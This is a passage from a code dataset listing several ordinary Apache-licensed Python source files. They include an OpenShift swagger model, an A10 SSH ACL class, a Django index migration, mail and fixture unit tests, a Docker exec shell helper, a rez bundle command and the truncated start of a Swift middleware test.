code | repo_name | path | language | license | size |
stringlengths 2-1.05M | stringlengths 5-104 | stringlengths 4-251 | stringclasses 1 value | stringclasses 15 values | int32 2-1.05M |
---|---|---|---|---|---|
# coding: utf-8
"""
OpenAPI spec version:
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from pprint import pformat
from six import iteritems
import re
class V1ImageSource(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
operations = [
]
# The key is attribute name
# and the value is attribute type.
swagger_types = {
'_from': 'V1ObjectReference',
'paths': 'list[V1ImageSourcePath]',
'pull_secret': 'V1LocalObjectReference'
}
# The key is attribute name
# and the value is json key in definition.
attribute_map = {
'_from': 'from',
'paths': 'paths',
'pull_secret': 'pullSecret'
}
def __init__(self, _from=None, paths=None, pull_secret=None):
"""
V1ImageSource - a model defined in Swagger
"""
self.__from = _from
self._paths = paths
self._pull_secret = pull_secret
@property
def _from(self):
"""
Gets the _from of this V1ImageSource.
From is a reference to an ImageStreamTag, ImageStreamImage, or DockerImage to copy source from.
:return: The _from of this V1ImageSource.
:rtype: V1ObjectReference
"""
return self.__from
@_from.setter
def _from(self, _from):
"""
Sets the _from of this V1ImageSource.
From is a reference to an ImageStreamTag, ImageStreamImage, or DockerImage to copy source from.
:param _from: The _from of this V1ImageSource.
:type: V1ObjectReference
"""
self.__from = _from
@property
def paths(self):
"""
Gets the paths of this V1ImageSource.
Paths is a list of source and destination paths to copy from the image.
:return: The paths of this V1ImageSource.
:rtype: list[V1ImageSourcePath]
"""
return self._paths
@paths.setter
def paths(self, paths):
"""
Sets the paths of this V1ImageSource.
Paths is a list of source and destination paths to copy from the image.
:param paths: The paths of this V1ImageSource.
:type: list[V1ImageSourcePath]
"""
self._paths = paths
@property
def pull_secret(self):
"""
Gets the pull_secret of this V1ImageSource.
        PullSecret is a reference to a secret to be used to pull the image from a registry. If the image is pulled from the OpenShift registry, this field does not need to be set.
:return: The pull_secret of this V1ImageSource.
:rtype: V1LocalObjectReference
"""
return self._pull_secret
@pull_secret.setter
def pull_secret(self, pull_secret):
"""
Sets the pull_secret of this V1ImageSource.
        PullSecret is a reference to a secret to be used to pull the image from a registry. If the image is pulled from the OpenShift registry, this field does not need to be set.
:param pull_secret: The pull_secret of this V1ImageSource.
:type: V1LocalObjectReference
"""
self._pull_secret = pull_secret
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(V1ImageSource.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
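# Hedged usage sketch (not part of the generated module): shows how this
# swagger model is typically constructed and serialized. Real code would pass
# V1ObjectReference / V1ImageSourcePath instances imported from the sibling
# generated models; None and [] stand in for them here.
if __name__ == '__main__':
    source = V1ImageSource(_from=None, paths=[], pull_secret=None)
    source.paths = []  # exercises the generated property setter
    print(source.to_dict())  # {'_from': None, 'paths': [], 'pull_secret': None}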
| detiber/lib_openshift | lib_openshift/models/v1_image_source.py | Python | apache-2.0 | 5,181 |
from a10sdk.common.A10BaseClass import A10BaseClass
class VeCfg(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param ve_end: {"type": "number", "description": "VE port", "format": "number"}
:param ve_start: {"type": "number", "description": "VE port (VE Interface number)", "format": "number"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "ve-cfg"
self.DeviceProxy = ""
self.ve_end = ""
self.ve_start = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class EthCfg(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param ethernet_start: {"type": "number", "description": "Ethernet port (Ethernet Interface number)", "format": "interface"}
:param ethernet_end: {"type": "number", "description": "Ethernet port", "format": "interface"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "eth-cfg"
self.DeviceProxy = ""
self.ethernet_start = ""
self.ethernet_end = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class AclV4(A10BaseClass):
"""Class Description::
IPv4 ACL for SSH service.
Class acl-v4 supports CRUD Operations and inherits from `common/A10BaseClass`.
This class is the `"PARENT"` class for this module.`
:param ve_cfg: {"minItems": 1, "items": {"type": "object"}, "uniqueItems": true, "type": "array", "array": [{"properties": {"ve-end": {"type": "number", "description": "VE port", "format": "number"}, "ve-start": {"type": "number", "description": "VE port (VE Interface number)", "format": "number"}, "optional": true}}]}
:param acl_id: {"description": "ACL id", "format": "number", "type": "number", "maximum": 199, "minimum": 1, "optional": false}
:param uuid: {"description": "uuid of the object", "format": "string", "minLength": 1, "modify-not-allowed": 1, "optional": true, "maxLength": 64, "type": "string"}
:param eth_cfg: {"minItems": 1, "items": {"type": "object"}, "uniqueItems": true, "type": "array", "array": [{"properties": {"ethernet-start": {"type": "number", "description": "Ethernet port (Ethernet Interface number)", "format": "interface"}, "ethernet-end": {"type": "number", "description": "Ethernet port", "format": "interface"}, "optional": true}}]}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
URL for this object::
`https://<Hostname|Ip address>//axapi/v3/enable-management/service/ssh/acl-v4/{acl_id}`.
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.required = [ "acl_id"]
self.b_key = "acl-v4"
self.a10_url="/axapi/v3/enable-management/service/ssh/acl-v4/{acl_id}"
self.DeviceProxy = ""
self.ve_cfg = []
self.acl_id = ""
self.uuid = ""
self.eth_cfg = []
for keys, value in kwargs.items():
setattr(self,keys, value)
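# Hedged usage sketch (illustrative only): the a10sdk models turn keyword
# arguments into instance attributes via the setattr loop above. DeviceProxy
# wiring for actual REST calls against the device is omitted.
if __name__ == '__main__':
    acl = AclV4(acl_id=10, eth_cfg=[{'ethernet-start': 1, 'ethernet-end': 4}])
    print(acl.a10_url)  # /axapi/v3/enable-management/service/ssh/acl-v4/{acl_id}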
| amwelch/a10sdk-python | a10sdk/core/enable/enable_management_service_ssh_acl_v4.py | Python | apache-2.0 | 3,405 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('server', '0015_auto_20150819_1501'),
]
operations = [
migrations.AlterField(
model_name='apikey',
name='private_key',
field=models.CharField(max_length=255, db_index=True),
),
migrations.AlterField(
model_name='apikey',
name='public_key',
field=models.CharField(max_length=255, db_index=True),
),
migrations.AlterField(
model_name='machine',
name='first_checkin',
field=models.DateTimeField(db_index=True, auto_now_add=True, null=True),
),
migrations.AlterField(
model_name='machine',
name='hd_space',
field=models.CharField(db_index=True, max_length=256, null=True, blank=True),
),
migrations.AlterField(
model_name='machine',
name='hd_total',
field=models.CharField(db_index=True, max_length=256, null=True, blank=True),
),
migrations.AlterField(
model_name='machine',
name='last_checkin',
field=models.DateTimeField(db_index=True, null=True, blank=True),
),
migrations.AlterField(
model_name='machine',
name='last_puppet_run',
field=models.DateTimeField(db_index=True, null=True, blank=True),
),
migrations.AlterField(
model_name='machine',
name='manifest',
field=models.CharField(db_index=True, max_length=256, null=True, blank=True),
),
migrations.AlterField(
model_name='machine',
name='memory',
field=models.CharField(db_index=True, max_length=256, null=True, blank=True),
),
migrations.AlterField(
model_name='machine',
name='memory_kb',
field=models.IntegerField(default=0, db_index=True),
),
migrations.AlterField(
model_name='machine',
name='munki_version',
field=models.CharField(db_index=True, max_length=256, null=True, blank=True),
),
migrations.AlterField(
model_name='machine',
name='operating_system',
field=models.CharField(db_index=True, max_length=256, null=True, blank=True),
),
migrations.AlterField(
model_name='machine',
name='puppet_errors',
field=models.IntegerField(default=0, db_index=True),
),
migrations.AlterField(
model_name='machine',
name='serial',
field=models.CharField(unique=True, max_length=100, db_index=True),
),
migrations.AlterField(
model_name='machinegroup',
name='key',
field=models.CharField(null=True, editable=False, max_length=255, blank=True, unique=True, db_index=True),
),
migrations.AlterField(
model_name='osqueryresult',
name='hostidentifier',
field=models.CharField(db_index=True, max_length=255, null=True, blank=True),
),
migrations.AlterField(
model_name='osqueryresult',
name='name',
field=models.CharField(max_length=255, db_index=True),
),
migrations.AlterField(
model_name='osqueryresult',
name='unix_time',
field=models.IntegerField(db_index=True),
),
migrations.AlterField(
model_name='pendingappleupdate',
name='update',
field=models.CharField(db_index=True, max_length=255, null=True, blank=True),
),
migrations.AlterField(
model_name='pendingappleupdate',
name='update_version',
field=models.CharField(db_index=True, max_length=256, null=True, blank=True),
),
migrations.AlterField(
model_name='pendingupdate',
name='update',
field=models.CharField(db_index=True, max_length=255, null=True, blank=True),
),
migrations.AlterField(
model_name='pendingupdate',
name='update_version',
field=models.CharField(db_index=True, max_length=255, null=True, blank=True),
),
]
| chasetb/sal | server/migrations/0016_auto_20151026_0851.py | Python | apache-2.0 | 4,470 |
from django.conf import settings
from django.core import mail
from rdmo.core.mail import send_mail
def test_send_mail(db):
send_mail('Subject', 'Message', to=['[email protected]'])
assert len(mail.outbox) == 1
assert mail.outbox[0].subject == '[example.com] Subject'
assert mail.outbox[0].body == 'Message'
assert mail.outbox[0].from_email == settings.DEFAULT_FROM_EMAIL
assert mail.outbox[0].to == ['[email protected]']
assert mail.outbox[0].cc == []
assert mail.outbox[0].bcc == []
assert mail.outbox[0].attachments == []
def test_send_mail_cc(db):
send_mail('Subject', 'Message', to=['[email protected]'], cc=['[email protected]'])
assert len(mail.outbox) == 1
assert mail.outbox[0].subject == '[example.com] Subject'
assert mail.outbox[0].body == 'Message'
assert mail.outbox[0].from_email == settings.DEFAULT_FROM_EMAIL
assert mail.outbox[0].to == ['[email protected]']
assert mail.outbox[0].cc == ['[email protected]']
assert mail.outbox[0].bcc == []
assert mail.outbox[0].attachments == []
def test_send_mail_bcc(db):
send_mail('Subject', 'Message', bcc=['[email protected]'])
assert len(mail.outbox) == 1
assert mail.outbox[0].subject == '[example.com] Subject'
assert mail.outbox[0].body == 'Message'
assert mail.outbox[0].from_email == settings.DEFAULT_FROM_EMAIL
assert mail.outbox[0].to == []
assert mail.outbox[0].cc == []
assert mail.outbox[0].bcc == ['[email protected]']
assert mail.outbox[0].attachments == []
def test_send_mail_from_email(db):
send_mail('Subject', 'Message', from_email='[email protected]', to=['[email protected]'])
assert len(mail.outbox) == 1
assert mail.outbox[0].subject == '[example.com] Subject'
assert mail.outbox[0].body == 'Message'
assert mail.outbox[0].from_email == '[email protected]'
assert mail.outbox[0].to == ['[email protected]']
assert mail.outbox[0].cc == []
assert mail.outbox[0].bcc == []
assert mail.outbox[0].attachments == []
def test_send_mail_from_attachments(db):
send_mail('Subject', 'Message', to=['[email protected]'], attachments=[
('Attachment', b'attachment', 'plain/text')
])
assert len(mail.outbox) == 1
assert mail.outbox[0].subject == '[example.com] Subject'
assert mail.outbox[0].body == 'Message'
assert mail.outbox[0].from_email == settings.DEFAULT_FROM_EMAIL
assert mail.outbox[0].to == ['[email protected]']
assert mail.outbox[0].cc == []
assert mail.outbox[0].bcc == []
assert mail.outbox[0].attachments == [
('Attachment', b'attachment', 'plain/text')
]
| DMPwerkzeug/DMPwerkzeug | rdmo/core/tests/test_mail.py | Python | apache-2.0 | 2,649 |
# Copyright 2015 Alex Brandt
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import inspect
import logging
import typing # noqa (use mypy typing)
import unittest
import unittest.mock
import uuid
from torment import fixtures
from torment import contexts
logger = logging.getLogger(__name__)
class FixturesCreateUnitTest(unittest.TestCase):
def test_fixture_create_without_context(self) -> None:
'''torment.fixtures.Fixture() → TypeError'''
self.assertRaises(TypeError, fixtures.Fixture)
def test_fixture_create_with_context(self) -> None:
'''torment.fixtures.Fixture(context).context == context'''
c = unittest.TestCase()
f = fixtures.Fixture(c)
self.assertEqual(f.context, c)
class FixturesPropertyUnitTest(unittest.TestCase):
def setUp(self) -> None:
self.c = unittest.TestCase()
self.f = fixtures.Fixture(self.c)
def test_fixture_category(self) -> None:
'''torment.fixtures.Fixture(context).category == 'fixtures' '''
self.f.__module__ = unittest.mock.MagicMock(__name__ = 'test_torment.test_unit.test_fixtures.fixture_a44bc6dda6654b1395a8c2cbd55d964d')
self.assertEqual(self.f.category, 'fixtures')
def test_fixture_description(self) -> None:
'''torment.fixtures.Fixture(context).description == '94d7c58f6ee44683936c21cb84d1e458—torment.fixtures' '''
self.f.context.module = 'fixtures'
self.f.uuid = uuid.UUID('94d7c58f6ee44683936c21cb84d1e458')
self.assertEqual(self.f.description, '94d7c58f6ee44683936c21cb84d1e458—fixtures')
def test_fixture_name(self) -> None:
'''torment.fixtures.Fixture(context).name == 'test_94d7c58f6ee44683936c21cb84d1e458' '''
self.f.__class__.__name__ = '94d7c58f6ee44683936c21cb84d1e458'
self.assertEqual(self.f.name, 'test_94d7c58f6ee44683936c21cb84d1e458')
class ErrorFixturesPropertyUnitTest(unittest.TestCase):
def test_error_fixture_description(self) -> None:
'''torment.fixtures.ErrorFixture(context).description == 'expected → failure' '''
class fixture(fixtures.Fixture):
@property
def description(self) -> str:
return 'expected'
class error_fixture(fixtures.ErrorFixture, fixture):
def __init__(self, *args, **kwargs) -> None:
super().__init__(*args, **kwargs)
self.error = RuntimeError('failure')
c = unittest.TestCase()
e = error_fixture(c)
self.assertEqual(e.description, 'expected → failure')
class ErrorFixturesRunTest(unittest.TestCase):
def test_error_fixture_run(self) -> None:
'''torment.fixtures.ErrorFixture(context).run()'''
class fixture(fixtures.Fixture):
def run(self):
raise RuntimeError('failure')
class error_fixture(fixtures.ErrorFixture, fixture):
def __init__(self, *args, **kwargs) -> None:
super().__init__(*args, **kwargs)
self.error = RuntimeError('failure')
c = unittest.TestCase()
e = error_fixture(c)
e.run()
self.assertIsInstance(e.exception, RuntimeError)
self.assertEqual(e.exception.args, ( 'failure', ))
class OfUnitTest(unittest.TestCase):
def test_of_zero(self) -> None:
'''torment.fixtures.of(()) == []'''
self.assertEqual(len(fixtures.of(())), 0)
def test_of_many_without_subclasses(self) -> None:
'''torment.fixtures.of(( FixtureA, )) == []'''
class FixtureA(object):
def __init__(self, context) -> None:
pass
self.assertEqual(len(fixtures.of(( FixtureA, ))), 0)
def test_of_many_with_subclasses(self) -> None:
'''torment.fixtures.of(( FixtureA, )) == [ fixture_a, ]'''
class FixtureA(object):
def __init__(self, context) -> None:
pass
class FixtureB(FixtureA):
pass
result = fixtures.of(( FixtureA, ))
self.assertEqual(len(result), 1)
self.assertIsInstance(result[0], FixtureB)
class RegisterUnitTest(unittest.TestCase):
def setUp(self) -> None:
_ = unittest.mock.patch('torment.fixtures.inspect')
mocked_inspect = _.start()
self.addCleanup(_.stop)
mocked_inspect.configure_mock(**{ 'isclass': inspect.isclass, 'isfunction': inspect.isfunction, })
mocked_inspect.stack.return_value = ( None, ( None, 'test_unit/test_d43830e2e9624dd19c438b15250c5818.py', ), )
class ContextStub(object):
pass
self.context = ContextStub()
self.context.module = mocked_inspect.getmodule.return_value = 'stack'
self.ns = {} # type: Dict[str, Any]
self.class_name = 'f_d43830e2e9624dd19c438b15250c5818'
def test_zero_properties(self) -> None:
'''torment.fixtures.register({}, (), {})'''
fixtures.register(self.ns, ( fixtures.Fixture, ), {})
_ = self.ns[self.class_name](self.context)
self.assertEqual(_.uuid, uuid.UUID('d43830e2e9624dd19c438b15250c5818'))
def test_one_literal_properties(self) -> None:
'''torment.fixtures.register({}, (), { 'a': 'a', })'''
fixtures.register(self.ns, ( fixtures.Fixture, ), { 'a': 'a', })
_ = self.ns[self.class_name](self.context)
self.assertEqual(_.a, 'a')
def test_one_class_properties(self) -> None:
'''torment.fixtures.register({}, (), { 'a': class, })'''
class A(object):
pass
fixtures.register(self.ns, ( fixtures.Fixture, ), { 'a': A, })
_ = self.ns[self.class_name](self.context)
self.assertIsInstance(_.a, A)
def test_one_fixture_class_properties(self) -> None:
'''torment.fixtures.register({}, (), { 'a': fixture_class, })'''
class A(fixtures.Fixture):
pass
fixtures.register(self.ns, ( fixtures.Fixture, ), { 'a': A, })
_ = self.ns[self.class_name](self.context)
self.assertIsInstance(_.a, A)
self.assertEqual(_.a.context, self.context)
def test_one_function_properties(self) -> None:
'''torment.fixtures.register({}, (), { 'a': self → None, })'''
def a(self) -> None:
pass
fixtures.register(self.ns, ( fixtures.Fixture, ), { 'a': a, })
_ = self.ns[self.class_name](self.context)
self.assertIsNone(_.a)
def test_description_property(self) -> None:
'''torment.fixtures.register({}, (), { 'description': 'needle', })'''
fixtures.register(self.ns, ( fixtures.Fixture, ), { 'description': 'needle', })
_ = self.ns[self.class_name](self.context)
self.assertEqual(_.description, 'd43830e2e9624dd19c438b15250c5818—stack—needle')
def test_error_property(self) -> None:
'''torment.fixtures.register({}, (), { 'error': …, })'''
fixtures.register(self.ns, ( fixtures.Fixture, ), { 'error': { 'class': RuntimeError, }, })
_ = self.ns[self.class_name](self.context)
self.assertIsInstance(_.error, RuntimeError)
def test_mocks_mock_property(self) -> None:
'''torment.fixtures.register({}, (), { 'mocks': { 'symbol': …, }, }).setup()'''
_ = unittest.mock.patch('torment.fixtures._find_mocker')
mocked_fixtures_find_mocker = _.start()
self.addCleanup(_.stop)
mocked_fixtures_find_mocker.return_value = lambda: True
_ = unittest.mock.patch('torment.fixtures._prepare_mock')
mocked_fixtures_prepare_mock = _.start()
self.addCleanup(_.stop)
fixtures.register(self.ns, ( fixtures.Fixture, ), { 'mocks': { 'symbol': {}, }, })
_ = self.ns[self.class_name](self.context)
_.setup()
mocked_fixtures_find_mocker.assert_called_once_with('symbol', self.context)
mocked_fixtures_prepare_mock.assert_called_once_with(self.context, 'symbol')
class PrepareMockUnitTest(unittest.TestCase):
def setUp(self) -> None:
class ContextStub(contexts.TestContext):
mocked_symbol = unittest.mock.MagicMock(name = 'ContextStub.mocked_symbol')
self.context = ContextStub()
def test_prepare_mock_empty_call_list(self) -> None:
'''torment.fixtures._prepare_mock(ContextStub, 'symbol'): mock has empty call list'''
fixtures._prepare_mock(self.context, 'symbol')
self.assertEqual(len(self.context.mocked_symbol.mock_calls), 0)
def test_prepare_mock_side_effect_zero_dots(self) -> None:
        '''torment.fixtures._prepare_mock(ContextStub, 'symbol', side_effect = range(2))'''
fixtures._prepare_mock(self.context, 'symbol', side_effect = range(2))
self.assertEqual(self.context.mocked_symbol(), 0)
self.assertEqual(self.context.mocked_symbol(), 1)
self.assertRaises(StopIteration, self.context.mocked_symbol)
def test_prepare_mock_return_value_zero_dots(self) -> None:
        '''torment.fixtures._prepare_mock(ContextStub, 'symbol', return_value = 'a')'''
fixtures._prepare_mock(self.context, 'symbol', return_value = 'a')
self.assertEqual(self.context.mocked_symbol(), 'a')
def test_prepare_mock_return_value_one_dots(self) -> None:
        '''torment.fixtures._prepare_mock(ContextStub, 'symbol.Sub', return_value = 'a')'''
fixtures._prepare_mock(self.context, 'symbol.Sub', return_value = 'a')
self.assertEqual(self.context.mocked_symbol.Sub(), 'a')
def test_prepare_mock_return_value_many_dots(self) -> None:
        '''torment.fixtures._prepare_mock(ContextStub, 'symbol.sub.a.b.c', return_value = 'a')'''
fixtures._prepare_mock(self.context, 'symbol.sub.a.b.c', return_value = 'a')
self.assertEqual(self.context.mocked_symbol.sub.a.b.c(), 'a')
def test_prepare_mock_return_value_many_dots_second_level(self) -> None:
        '''torment.fixtures._prepare_mock(ContextStub, 'symbol.sub.a.b.c', return_value = 'a')'''
class ContextStub(contexts.TestContext):
mocked_symbol_sub = unittest.mock.MagicMock(name = 'ContextStub.mocked_symbol_sub')
c = ContextStub()
fixtures._prepare_mock(c, 'symbol.sub.a.b.c', return_value = 'a')
self.assertEqual(c.mocked_symbol_sub.a.b.c(), 'a')
def test_prepare_mock_return_value_many_dots_all_levels(self) -> None:
        '''torment.fixtures._prepare_mock(ContextStub, 'symbol.Sub.a.b.c', return_value = 'a')'''
class ContextStub(contexts.TestContext):
mocked_symbol_sub_a_b_c = unittest.mock.MagicMock(name = 'ContextStub.mocked_symbol_sub_a_b_c')
c = ContextStub()
fixtures._prepare_mock(c, 'symbol.Sub.a.b.c', return_value = 'a')
self.assertEqual(c.mocked_symbol_sub_a_b_c(), 'a')
class FindMockerUnitTest(unittest.TestCase):
def test_find_mocker_found_zero_levels(self) -> None:
        '''torment.fixtures._find_mocker('symbol', ContextStub) == mock_symbol'''
class ContextStub(contexts.TestContext):
def mock_symbol(self):
pass
c = ContextStub()
method = fixtures._find_mocker('symbol', c)
self.assertEqual(method, c.mock_symbol)
def test_find_mocker_found_second_level(self) -> None:
        '''torment.fixtures._find_mocker('symbol.Sub', ContextStub) == mock_symbol_sub'''
class ContextStub(contexts.TestContext):
def mock_symbol_sub(self):
pass
c = ContextStub()
method = fixtures._find_mocker('symbol.Sub', c)
self.assertEqual(method, c.mock_symbol_sub)
def test_find_mocker_found_many_levels(self) -> None:
        '''torment.fixtures._find_mocker('symbol.sub.a.b', ContextStub) == mock_symbol_sub_a_b'''
class ContextStub(contexts.TestContext):
def mock_symbol_sub_a_b(self):
pass
c = ContextStub()
method = fixtures._find_mocker('symbol.sub.a.b', c)
self.assertEqual(method, c.mock_symbol_sub_a_b)
def test_find_mocker_not_found(self) -> None:
        '''torment.fixtures._find_mocker('fakesymbol', ContextStub) == lambda: False'''
class ContextStub(contexts.TestContext):
pass
c = ContextStub()
method = fixtures._find_mocker('fakesymbol', c)
self.assertFalse(method())
self.assertEqual(method.__name__, 'noop')
class ResolveFunctionsUnitTest(unittest.TestCase):
def setUp(self) -> None:
class StubFixture(object):
pass
self.f = StubFixture()
self.f.name = 'testing_fixture_stub'
self.o = copy.deepcopy(self.f)
def test_zero_functions(self) -> None:
'''torment.fixtures._resolve_functions({}, fixture)'''
fixtures._resolve_functions({}, self.f)
self.assertEqual(dir(self.o), dir(self.f))
def test_one_functions_without_parameters(self) -> None:
'''torment.fixtures._resolve_functions({ 'a': ø → None, }, fixture)'''
def a() -> None:
pass
fixtures._resolve_functions({ 'a': a, }, self.f)
self.assertEqual(id(self.f.a), id(a))
def test_one_functions_with_self_parameter(self) -> None:
'''torment.fixtures._resolve_functions({ 'a': self → None, }, fixture)'''
def a(self) -> None:
pass
fixtures._resolve_functions({ 'a': a, }, self.f)
self.assertIsNone(self.f.a)
def test_one_functions_with_self_parameter_raises_attributeerror(self) -> None:
'''torment.fixtures._resolve_functions({ 'a': self → self.b, }, fixture)'''
def a(self):
return self.b
fixtures._resolve_functions({ 'a': a, }, self.f)
self.assertEqual(id(self.f.a), id(a))
def test_many_functions(self) -> None:
'''torment.fixtures._resolve_functions({ 'a': self → self.b, 'b': self → None, }, fixture)'''
def a(self) -> None:
return self.b
def b(self) -> None:
pass
fixtures._resolve_functions({ 'a': a, 'b': b, }, self.f)
self.assertIsNone(self.f.a)
self.assertIsNone(self.f.b)
class UniqueClassNameUnitTest(unittest.TestCase):
def setUp(self) -> None:
self.uuid = uuid.uuid4()
def test_empty_namespace(self) -> None:
'''torment.fixtures._unique_class_name({}, uuid) == 'f_{uuid}' '''
n = fixtures._unique_class_name({}, self.uuid)
self.assertEqual(n, 'f_' + self.uuid.hex)
def test_one_namespace(self) -> None:
'''torment.fixtures._unique_class_name({ 'f_{uuid}': None, }, uuid) == 'f_{uuid}_1' '''
n = fixtures._unique_class_name({ 'f_' + self.uuid.hex: None, }, self.uuid)
self.assertEqual(n, 'f_' + self.uuid.hex + '_1')
def test_two_namespace(self) -> None:
'''torment.fixtures._unique_class_name({ 'f_{uuid}': None, 'f_{uuid}_1': None, }, uuid) == 'f_{uuid}_2' '''
n = fixtures._unique_class_name({ 'f_' + self.uuid.hex: None, 'f_' + self.uuid.hex + '_1': None, }, self.uuid)
self.assertEqual(n, 'f_' + self.uuid.hex + '_2')
| kumoru/torment | test_torment/test_unit/test_fixtures/__init__.py | Python | apache-2.0 | 15,613 |
# -*- coding: utf-8 -*-
#
# Copyright (C) 2015-2016 Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
Docker shell helper class module.
"""
from __future__ import unicode_literals, absolute_import
from __future__ import print_function, division
from topology.platforms.shell import PExpectShell, PExpectBashShell
class DockerExecMixin(object):
"""
Docker ``exec`` connection mixin for the Topology shell API.
This class implements a ``_get_connect_command()`` method that allows to
interact with a shell through a ``docker exec`` interactive command, and
extends the constructor to request for container related parameters.
:param str container: Container unique identifier.
:param str command: Command to be executed with the ``docker exec`` that
will launch an interactive session.
"""
def __init__(self, container, command, *args, **kwargs):
self._container = container
self._command = command
super(DockerExecMixin, self).__init__(*args, **kwargs)
def _get_connect_command(self):
return 'docker exec -i -t {} {}'.format(
self._container, self._command
)
class DockerShell(DockerExecMixin, PExpectShell):
"""
Generic ``docker exec`` shell for unspecified interactive session.
"""
class DockerBashShell(DockerExecMixin, PExpectBashShell):
"""
Specialized ``docker exec`` shell that will run and setup a bash
interactive session.
"""
__all__ = ['DockerShell', 'DockerBashShell']
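# Hedged usage sketch: exercises only the mixin's command construction. The
# real shell classes also need the PExpectShell constructor arguments
# (prompt, encoding, ...), which are not assumed here.
if __name__ == '__main__':
    class _Stub(DockerExecMixin, object):
        pass
    stub = _Stub('my_container', 'sh')
    print(stub._get_connect_command())  # docker exec -i -t my_container sh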
| HPENetworking/topology_docker | lib/topology_docker/shell.py | Python | apache-2.0 | 2,063 |
# SPDX-License-Identifier: Apache-2.0
# Copyright Contributors to the Rez Project
'''
Bundle a context and its packages into a relocatable dir.
'''
from __future__ import print_function
import os
import os.path
import sys
def setup_parser(parser, completions=False):
group = parser.add_mutually_exclusive_group()
group.add_argument(
"-s", "--skip-non-relocatable", action="store_true",
help="leave non-relocatable packages non-bundled, rather than raise an error")
group.add_argument(
"-f", "--force", action="store_true",
help="bundle package even if it isn't relocatable (use at your own risk)")
group.add_argument(
"-n", "--no-lib-patch", action="store_true",
help="don't apply library patching within the bundle")
parser.add_argument(
"RXT",
help="context to bundle")
parser.add_argument(
"DEST_DIR",
help="directory to create bundle in; must not exist")
def command(opts, parser, extra_arg_groups=None):
from rez.utils.logging_ import print_error
from rez.bundle_context import bundle_context
from rez.resolved_context import ResolvedContext
rxt_filepath = os.path.abspath(os.path.expanduser(opts.RXT))
dest_dir = os.path.abspath(os.path.expanduser(opts.DEST_DIR))
# sanity checks
if not os.path.exists(rxt_filepath):
print_error("File does not exist: %s", rxt_filepath)
sys.exit(1)
context = ResolvedContext.load(rxt_filepath)
bundle_context(
context=context,
dest_dir=dest_dir,
force=opts.force,
skip_non_relocatable=opts.skip_non_relocatable,
verbose=opts.verbose,
patch_libs=(not opts.no_lib_patch)
)
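# Hedged CLI sketch (paths are illustrative). Once registered with the rez
# argument parser, this subcommand is invoked along the lines of:
#
#   rez bundle --skip-non-relocatable context.rxt ./my_bundle
#
# DEST_DIR must not already exist; the bundle is created there.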
| instinct-vfx/rez | src/rez/cli/bundle.py | Python | apache-2.0 | 1,729 |
# Copyright (c) 2012 OpenStack, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import array
import unittest
from shutil import rmtree
import os
from swift.common import ring, ondisk
from swift.common.utils import json
from swift.common.swob import Request, Response
from swift.common.middleware import list_endpoints
class FakeApp(object):
def __call__(self, env, start_response):
return Response(body="FakeApp")(env, start_response)
def start_response(*args):
pass
class TestListEndpoints(unittest.TestCase):
def setUp(self):
ondisk.HASH_PATH_SUFFIX = 'endcap'
ondisk.HASH_PATH_PREFIX = ''
self.testdir = os.path.join(os.path.dirname(__file__), 'ring')
rmtree(self.testdir, ignore_errors=1)
os.mkdir(self.testdir)
accountgz = os.path.join(self.testdir, 'account.ring.gz')
containergz = os.path.join(self.testdir, 'container.ring.gz')
objectgz = os.path.join(self.testdir, 'object.ring.gz')
# Let's make the rings slightly different so we can test
# that the correct ring is consulted (e.g. we don't consult
# the object ring to get nodes for a container)
